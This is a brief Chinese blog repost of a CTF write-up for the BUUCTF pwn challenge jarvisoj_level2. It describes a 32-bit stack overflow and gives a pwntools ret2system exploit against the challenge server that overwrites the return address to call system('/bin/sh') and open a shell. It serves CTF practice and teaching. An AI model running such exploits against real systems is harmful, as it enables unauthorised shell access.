其他分享
首页 > 其他分享> > [BUUCTF-pwn]——jarvisoj_level2

[BUUCTF-pwn]——jarvisoj_level2

作者:互联网

[BUUCTF-pwn]——jarvisoj_level2

checksec 一下下, 32程序
在这里插入图片描述
IDA中看下,发现了system函数还是两个,有可利用的栈溢出read函数,shift+F12,还发现了"/bin/sh"字符串. 所以exploit就如下
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

exploit

from pwn import *
p = remote("node3.buuoj.cn",28375)
binsh = 0x0804A024
sys_addr = 0x0804845C
payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(binsh)
p.sendlineafter("Input:\n",payload)
p.interactive()

标签:binsh,cn,buuoj,jarvisoj,level2,pwn
来源: https://blog.csdn.net/Y_peak/article/details/113784704